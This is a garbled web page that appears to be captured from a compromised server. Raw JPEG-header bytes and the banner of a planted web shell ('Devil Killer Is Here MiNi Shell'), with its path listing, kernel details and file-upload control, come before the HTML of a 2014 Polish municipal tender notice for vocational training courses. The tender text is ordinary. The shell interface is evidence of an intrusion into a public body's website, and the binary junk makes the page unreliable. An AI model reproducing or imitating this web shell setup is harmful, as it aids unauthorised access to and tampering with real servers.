JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140715/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140715/236276-N-2014.html

<p class="kh_header"><b>Jastrzębie Zdrój: Organizacja i przeprowadzenie szkoleń zawodowych w ramach aktywizacji społecznej i zawodowej projektu O krok do przodu współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 236276 - 2014; data zamieszczenia: 15.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Opolska 9, 44-335 Jastrzębie Zdrój, woj. śląskie, tel. 32 43 49 600, faks 32 47 40 146.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ops.jastrzebie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie szkoleń zawodowych w ramach aktywizacji społecznej i zawodowej projektu O krok do przodu współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkoleń zawodowych dla uczestników projektu systemowego pod nazwą O KROK DO PRZODU współfinansowanego przez Unię Europejską w ramach  Europejskiego Funduszu Społecznego; Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji; Poddziałanie, 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej, współfinansowanego ze środków Europejskiego Funduszu Społecznego.
Zamawiający przewiduje możliwość złożenia oferty przez jednego Wykonawcę na jedną lub więcej części zamówienia. Oferta winna obejmować cały zakres rzeczowy zadania.
Podział przedmiotu zamówienia na części przedstawia się następująco:
CZĘŚĆ I 
Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia dla 10 osób pn. Operator koparko-ładowarki kl. III, w ramach Projektu O KROK DO PRZODU współfinansowanego przez Unię Europejską w ramach  Europejskiego Funduszu Społecznego; Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji; Poddziałanie, 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej
CZĘŚĆ II
Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursu spawania metodą MAG (135) dla 4 osób w ramach Projektu O KROK DO PRZODU współfinansowanego przez Unię Europejską w ramach  Europejskiego Funduszu Społecznego; Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji; Poddziałanie, 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.	
CZĘŚĆ III
Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursu na prawo jazdy kategorii C oraz kwalifikacji wstępnej (dla osób powyżej 21 roku życia) przez podmioty posiadające wpis do rejestru przedsiębiorców prowadzących ośrodek szkolenia kierowców dla 4 osób w ramach Projektu O KROK DO PRZODU współfinansowanego przez Unię Europejską w ramach  Europejskiego Funduszu Społecznego; Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji; Poddziałanie, 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 19.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I
-Posiadanie aktualnego wpisu do rejestru instytucji szkoleniowych prowadzony przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej.
-Posiadanie potwierdzenia spełnienia warunków § 25 Rozporządzenia Ministra Gospodarki z dnia 20 września 2001 r. (Dz. U. Nr 118, poz. 1263) wydanego przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie do prowadzania szkoleń dla operatorów na koparko-ładowarkę.
Część II
-Posiadanie aktualnego wpisu do rejestru instytucji szkoleniowych prowadzony przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej.
-Posiada potwierdzenie objęcia ośrodka szkoleniowego lub kursu spawania merytorycznym nadzorem Instytutu Spawalnictwa w Gliwicach tj. posiada aktualny atest lub jednorazową zgodę na przeprowadzenie kursu spawania- wydane przez Instytut Spawalnictwa w Gliwicach.
Część III
-Posiadanie aktualnego wpisu do rejestru przedsiębiorców prowadzących ośrodek szkolenia kierowców,
-Posiadanie wpisu do rejestru instytucji szkoleniowych prowadzony przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej.
Dla wykazania, że wykonawca spełnia ten warunek, Zamawiający wymaga, aby Wykonawca złożył oświadczenie na druku stanowiącym załącznik nr 2 do SIWZ oraz przedłożył dokumenty o których mowa w pkt. 9 SIWZ
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I
Zamawiający nie określa szczegółowo sposobu oceny spełnienia tego warunku. Dla wykazania, że wykonawca spełnia ten warunek, Zamawiający wymaga, aby Wykonawca złożył oświadczenie na druku stanowiącym załącznik nr 2 do SIWZ.
Część II
Zamawiający nie określa szczegółowo sposobu oceny spełnienia tego warunku. Dla wykazania, że wykonawca spełnia ten warunek, Zamawiający wymaga, aby Wykonawca złożył oświadczenie na druku stanowiącym załącznik nr 2 do SIWZ.
Część III
Zamawiający nie określa szczegółowo sposobu oceny spełnienia tego warunku. Dla wykazania, że wykonawca spełnia ten warunek, Zamawiający wymaga, aby Wykonawca złożył oświadczenie na druku stanowiącym załącznik nr 2 do SIWZ.
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I
Zamawiający nie określa szczegółowo sposobu oceny spełnienia tego warunku. Dla wykazania, że wykonawca spełnia ten warunek, Zamawiający wymaga, aby Wykonawca złożył oświadczenie na druku stanowiącym załącznik nr 2 do SIWZ.
Część II
Zamawiający nie określa szczegółowo sposobu oceny spełnienia tego warunku. Dla wykazania, że wykonawca spełnia ten warunek, Zamawiający wymaga, aby Wykonawca złożył oświadczenie na druku stanowiącym załącznik nr 2 do SIWZ.
Część III
Wykonawca udokumentuje, że dysponuje lub będzie dysponował w dacie i miejscu wykonywania zamówienia co najmniej 1 samochodem przystosowanym do realizacji kursu prawa jazdy kat. C oraz kwalifikacji wstępnej przyśpieszonej.
Dla wykazania, że wykonawca spełnia ten warunek, Zamawiający wymaga, aby Wykonawca złożył oświadczenie na druku stanowiącym załącznik nr 2 do SIWZ oraz przedłożył dokumenty o których mowa w pkt. 9 SIWZ.
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I
Zamawiający nie określa szczegółowo sposobu oceny spełnienia tego warunku. Dla wykazania, że wykonawca spełnia ten warunek, Zamawiający wymaga, aby Wykonawca złożył oświadczenie na druku stanowiącym załącznik nr 2 do SIWZ.
Część II
Zamawiający nie określa szczegółowo sposobu oceny spełnienia tego warunku. Dla wykazania, że wykonawca spełnia ten warunek, Zamawiający wymaga, aby Wykonawca złożył oświadczenie na druku stanowiącym załącznik nr 2 do SIWZ.
Część III
Wykonawca udokumentuje, że dysponuje lub będzie dysponował w dacie i miejscu wykonywania zamówienia co najmniej 1 osobą posiadającymi uprawnienia instruktora nauki jazdy w zakresie prawa jazdy kat. C oraz kwalifikacji wstępnej przyśpieszonej, 
Dla wykazania, że wykonawca spełnia ten warunek, Zamawiający wymaga, aby Wykonawca złożył oświadczenie na druku stanowiącym załącznik nr 2 do SIWZ oraz przedłożył dokumenty o których mowa w pkt. 9 SIWZ.
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I
Zamawiający nie określa szczegółowo sposobu oceny spełnienia tego warunku. Dla wykazania, że wykonawca spełnia ten warunek, Zamawiający wymaga, aby Wykonawca złożył oświadczenie na druku stanowiącym załącznik nr 2 do SIWZ.
Część II
Zamawiający nie określa szczegółowo sposobu oceny spełnienia tego warunku. Dla wykazania, że wykonawca spełnia ten warunek, Zamawiający wymaga, aby Wykonawca złożył oświadczenie na druku stanowiącym załącznik nr 2 do SIWZ.
Część III
Zamawiający nie określa szczegółowo sposobu oceny spełnienia tego warunku. Dla wykazania, że wykonawca spełnia ten warunek, Zamawiający wymaga, aby Wykonawca złożył oświadczenie na druku stanowiącym załącznik nr 2 do SIWZ.
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Wypełniony formularz oferty wraz z oświadczeniem dotyczącym podwykonawcy, oraz o zapoznaniu się z treścią specyfikacji i projektem umowy, o związaniu ofertą oraz aktualności dostarczonych zaświadczeń zgodny w treści z wzorem stanowiącym - załącznik nr 1a, 1b, 1c- odpowiedni dla danej części wskazanej w pkt. 3 SIWZ.
2)Pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu, z którego wynika jego zakres, podpisane przez osoby uprawnione do reprezentowania firmy Wykonawcy (jeżeli Wykonawca jest reprezentowany przez pełnomocnika lub jeżeli istnieje ustawowy obowiązek ustanowienia pełnomocnictwa. 
Uwaga: pełnomocnictwo winno być przedstawione w oryginale lub kserokopii poświadczonej notarialnie.
3)Pisemne zobowiązanie do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówień - tylko jeżeli dotyczy (przykładowy wzór - załącznik nr 5 SIWZ)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa na część I
1.Zakazuje się istotnych zmian niniejszej umowy w stosunku do treści oferty - na podstawie, której dokonano wyboru wykonawcy z zastrzeżeniem ust. 2.
W przypadku zmiany prawodawstwa wprowadzającego zmiany w zasadach  szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami Wykonawca w ramach wynagrodzenia o którym mowa w §3 zobowiązany będzie przeprowadzić kurs zgodnie z nowymi przepisami. 
2.Dopuszcza się dokonywania zmian treści umowy w zakresie zmiany składu kadry szkoleniowej, przy czym zmiany te nie mogą powodować pogorszenia poziomu kwalifikacji zmienionej kadry w stosunku do tej zaoferowanej w momencie podpisania umowy. Dokonane w/w zmiany wymagają sporządzania aneksu. Wykonawca zobowiązany jest do wcześniejszego poinformowania Zamawiającego w formie pisemnej o zaistniałych okolicznościach, które spowodowały zmiany osób prowadzących. Zamawiający zastrzega sobie, nie wyrażenie zgody na prowadzenie zajęć przez wskazaną osobę w przypadku, gdy kwalifikacje takiej osoby będą niższe od proponowanych w ofercie.
3.Dopuszcza się dokonywania zmian umowy w zakresie zwiększenia częstotliwości zajęć do 5 dni w tygodniu i poza godzinami 9:00-16:00 w uzasadnionych przypadkach. Dokonanie w/w zmiany wymaga sporządzenia aneksu. Zamawiający zastrzega sobie nie wyrażenie zgody na zwiększenie częstotliwości zajęć. 
4.W zakresie podwykonawców, wykazanych na etapie złożonej oferty lub, których konieczność ujawnienia wynikła na etapie realizacji zamówienia, którym Wykonawca powierzył lub ma zamiar powierzyć wykonanie części zamówienia
Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się, na zasadach określonych w art. 26 ust 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1, wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
5.Zmiana postanowień zawartej umowy dokonywana będzie w formie pisemnej pod rygorem nieważności.
Umowa na część II
1.Zakazuje się istotnych zmian niniejszej umowy w stosunku do treści oferty - na podstawie, której dokonano wyboru wykonawcy z zastrzeżeniem ust. 2.
W przypadku zmiany prawodawstwa wprowadzającego zmiany w zasadach  szkolenia, egzaminowania i uzyskiwania uprawnień Wykonawca w ramach wynagrodzenia o którym mowa w §3 zobowiązany będzie przeprowadzić kurs zgodnie z nowymi przepisami. 
2. Dopuszcza się dokonywania zmian treści umowy w zakresie zmiany składu kadry szkoleniowej, przy czym zmiany te nie mogą powodować pogorszenia poziomu kwalifikacji zmienionej kadry w stosunku do tej zaoferowanej w momencie podpisania umowy. Dokonane w/w zmiany wymagają sporządzania aneksu. Wykonawca zobowiązany jest do wcześniejszego poinformowania Zamawiającego w formie pisemnej o zaistniałych okolicznościach, które spowodowały zmiany osób prowadzących. Zamawiający zastrzega sobie, nie wyrażenie zgody na prowadzenie zajęć przez wskazaną osobę w przypadku, gdy kwalifikacje takiej osoby będą niższe od proponowanych w ofercie.
3.Dopuszcza się dokonywania zmian umowy w zakresie zwiększenia częstotliwości zajęć do 5 dni w tygodniu i poza godzinami 9:00-16:00 w uzasadnionych przypadkach. Dokonanie w/w zmiany wymaga sporządzenia aneksu. Zamawiający zastrzega sobie nie wyrażenie zgody na zwiększenie częstotliwości zajęć. 
4.W zakresie podwykonawców, wykazanych na etapie złożonej oferty lub, których konieczność ujawnienia wynikła na etapie realizacji zamówienia, którym Wykonawca powierzył lub ma zamiar powierzyć wykonanie części zamówienia
Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się, na zasadach określonych w art. 26 ust 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1, wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
5.Zmiana postanowień zawartej umowy dokonywana będzie w formie pisemnej pod rygorem nieważności.
Umowa na część III
1.Zakazuje się istotnych zmian niniejszej umowy w stosunku do treści oferty - na podstawie, której dokonano wyboru wykonawcy z zastrzeżeniem ust. 2,3.
W przypadku zmiany prawodawstwa wprowadzającego zmiany w zasadach  szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami Wykonawca w ramach wynagrodzenia o którym mowa w §3 zobowiązany będzie przeprowadzić kurs zgodnie z nowymi przepisami. 
2.Dopuszcza się dokonywania zmian treści umowy w zakresie zmiany składu kadry szkoleniowej, przy czym zmiany te nie mogą powodować pogorszenia poziomu kwalifikacji zmienionej kadry w stosunku do tej zaoferowanej w ofercie przetargowej. Dokonane w/w zmiany wymagają sporządzania aneksu. Wykonawca zobowiązany jest do wcześniejszego poinformowania Zamawiającego w formie pisemnej o zaistniałych okolicznościach, które spowodowały zmiany osób prowadzących. Zamawiający zastrzega sobie, nie wyrażenie zgody na prowadzenie zajęć przez wskazaną osobę w przypadku, gdy kwalifikacje takiej osoby będą niższe od proponowanych w ofercie.
3.Dopuszcza się dokonywania zmian umowy w zakresie zwiększenia częstotliwości zajęć teoretycznych do 5 dni w tygodniu i poza godzinami 9:00-16:00 w uzasadnionych przypadkach. Dokonanie w/w zmiany wymaga sporządzenia aneksu. Zamawiający zastrzega sobie nie wyrażenie zgody na zwiększenie częstotliwości zajęć. 
4.W zakresie podwykonawców, wykazanych na etapie złożonej oferty lub, których konieczność ujawnienia wynikła na etapie realizacji zamówienia, którym Wykonawca powierzył lub ma zamiar powierzyć wykonanie części zamówienia
Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się, na zasadach określonych w art. 26 ust 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1, wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
5.Zmiana postanowień zawartej umowy dokonywana będzie w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ops.jastrzebie.pl, www.bip.jastrzebie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej, ul. Opolska 9, 44-335 Jastrzębie-Zdrój pokój nr 40.</p>
